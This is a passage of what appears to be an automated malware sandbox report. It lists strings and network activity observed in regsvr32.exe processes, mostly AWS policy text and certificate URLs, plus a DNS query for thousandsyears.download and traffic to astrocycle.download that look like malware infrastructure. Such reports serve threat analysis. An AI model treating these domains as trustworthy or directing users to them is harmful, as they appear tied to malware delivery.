https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.c
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmpString found in binary or memory: X-Amz-Cf-IdeaQqc8iBLxpWxiD2WtTR8e1VwSVwXFlnjVHZWquCo3TDJPScneKUqQ==X-Amz-Cf-PopZRH50-C1X-CacheMiss from cloudfrontPermissions-Policyinterest-cohort=()Content-Security-Policy-Report-Onlydefault-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.c
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmpString found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southea
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmpString found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southea
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
        Source: unknownDNS traffic detected: queries for: thousandsyears.download
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Jul 2021 15:49:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Xf2IDfcLQCVH1rz6byqCytHzvmEvCgcaCZRg%2F9gUSLGEhZx6kGlSL%2BnZB0MJnL3Kz5tZUf2obw5UnExmwPSZFk8Kddx%2FnyTc43EeLUX3kCfMGteS4IxdgGxjDeCGf2BD7A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a9fc654c6c4e8b-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
        Source: regsvr32.exe, 00000004.00000002.2104252474.000000000031E000.00000004.00000020.sdmpString found in binary or memory: http://astrocycle.download/
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
        Source: regsvr32.exe, 00000004.00000002.2104193166.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
        Source: regsvr32.exe, 00000004.00000002.2104193166.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://crl.sca1b.amazontrus
        Source: regsvr32.exe, 00000004.00000003.2100828150.00000000002B4000.00000004.00000001.sdmpString found in binary or memory: http://crl.sca1b.amazontrusP
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
        Source: regsvr32.exe, 00000004.00000002.2104193166.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
        Source: regsvr32.exe, 00000004.00000002.2106683153.0000000003090000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
        Source: regsvr32.exe, 00000004.00000002.2106683153.0000000003090000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
        Source: regsvr32.exe, 00000004.00000002.2108485342.0000000003277000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
        Source: regsvr32.exe, 00000004.00000002.2108485342.0000000003277000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://o.ss2.us/0
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
        Source: regsvr32.exe, 00000004.00000002.2104193166.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
        Source: regsvr32.exe, 00000004.00000002.2104193166.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.sca1b
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://s.ss2.us/r.crl0
        Source: regsvr32.exe, 00000004.00000002.2105513223.0000000002CA0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: regsvr32.exe, 00000003.00000002.2096994584.0000000001D10000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2104317022.0000000001D40000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2105003681.0000000001D60000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
        Source: regsvr32.exe, 00000004.00000002.2108485342.0000000003277000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
        Source: regsvr32.exe, 00000004.00000002.2108485342.0000000003277000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
        Source: regsvr32.exe, 00000004.00000002.2105513223.0000000002CA0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
        Source: regsvr32.exe, 00000004.00000002.2106683153.0000000003090000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
        Source: regsvr32.exe, 00000004.00000002.2108485342.0000000003277000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
        Source: regsvr32.exe, 00000004.00000002.2106683153.0000000003090000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
        Source: regsvr32.exe, 00000004.00000002.2106683153.0000000003090000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: http://x.ss2.us/x.cer0&
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://112-tzm-766.mktoresp.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://112-tzm-766.mktoutil.com
        Source: regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.47/js
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.76
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images
        Source: regsvr32.exe, 00000004.00000003.2100757073.0000000003620000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/directories
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-cardsui
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-head.js
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/librastandardlib
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.112/plc
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/psf/null
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com;
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://a0.p.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://a1.awsstatic.com
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/w
        Source: regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://amazonwebservices.d2.sc.omtrdc.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://anchor.fm
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://api.regional-table.region-services.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://api.us-west-2.prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://aws-quickstart.s3.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100828150.00000000002B4000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc2=h_lg
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/
